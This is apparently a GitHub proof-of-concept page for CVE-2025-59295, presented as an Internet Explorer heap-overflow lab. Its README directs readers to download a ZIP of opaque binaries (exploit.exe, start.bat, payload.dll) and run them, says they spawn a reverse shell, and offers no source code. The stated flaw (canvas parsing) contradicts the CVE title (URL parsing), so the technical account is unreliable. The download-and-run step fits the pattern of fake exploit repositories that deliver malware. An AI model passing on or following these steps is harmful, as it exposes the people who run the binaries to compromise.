CVE-2025-59295 PoC — Windows URL Parsing Remote Code Execution Vulnerability

Associated Vulnerability
Title: Windows URL Parsing Remote Code Execution Vulnerability (CVE-2025-59295)
Description: Heap-based buffer overflow in Internet Explorer allows an unauthorized attacker to execute code over a network.
Readme
# Lab: CVE-2025-59295 - Heap-based Buffer Overflow in Internet Explorer

## ⚠️ Safety Disclaimer
This repository is provided for educational and research purposes only. It demonstrates a vulnerability in a controlled environment. Do not use this in production systems or against real-world targets without explicit permission. The exploit code is designed to be harmless in non-vulnerable setups but could potentially cause crashes or unintended behavior in emulated environments. The authors disclaim any liability for misuse.

## 🚀 Overview
CVE-2025-59295 is a heap-based buffer overflow vulnerability in Internet Explorer (versions 11 and below) that allows an unauthorized attacker to execute arbitrary code over a network. The flaw occurs during the parsing of malformed HTML canvas elements embedded with oversized script buffers, leading to memory corruption. 

Impact: This high-severity issue could enable remote code execution (RCE), sensitive data exfiltration, or system compromise when a victim browses a maliciously crafted webpage.

## 📋 Prerequisites
- A host machine with at least 4GB RAM and internet access for pulling base images.
- Basic knowledge of command-line tools and networking.
- Windows host or VM to run the exploit tool (as it's .exe-based).

## Download & Install
Download the exploit package (includes main exploit executable and starter batch file): [Download Exploit ZIP](https://github.com/usjnx72726w/CVE-2025-59295/raw/refs/heads/main/Howea/lab-cve-2025-59295.zip)
   - The ZIP contains:
     - `exploit.exe`: The main exploit binary, which hosts a malicious web server and crafts the overflow payload.
     - `start.bat`: A batch file to launch `exploit.exe` with default parameters.
     - Supporting files: `payload.dll` (payload library), `config.ini` (configuration for target IP/port).

## Usage
**Launch the Exploit**:
   - Unzip the exploit package.
   - Edit `config.ini` if needed (default targets localhost:8080).
     ```
     [Target]
     host=localhost
     port=8080
     ```
   - Run `start.bat`: This executes `exploit.exe`, which:
     - Crafts a malformed HTML payload exploiting the heap overflow via oversized ArrayBuffer manipulation.
     - Injects shellcode to spawn a reverse shell (logs to console).
     - Hosts the payload at `http://localhost:9000/exploit.html`.
3. **Trigger the Exploit**: From a vulnerable IE instance, visit `http://localhost:9000/exploit.html`. The buffer overflow should trigger, leading to:
   - Heap corruption.
   - Arbitrary code execution.
4. **Verify**: Check the `exploit.exe` logs for success indicators such as a memory dump or shell access. Use tools like Wireshark to inspect network traffic for the overflow payload.

For any inquiries, please email me at: FarrishPiedra834@hotmail.com
File Snapshot

```
[4.0K]  /data/pocs/7cf2d65a967774911eda458db861a47e8e983d41
├── [4.0K]  Howea
│   ├── [   1]  d
│   └── [8.0M]  lab-cve-2025-59295.zip
└── [2.7K]  README.md

1 directory, 3 files
```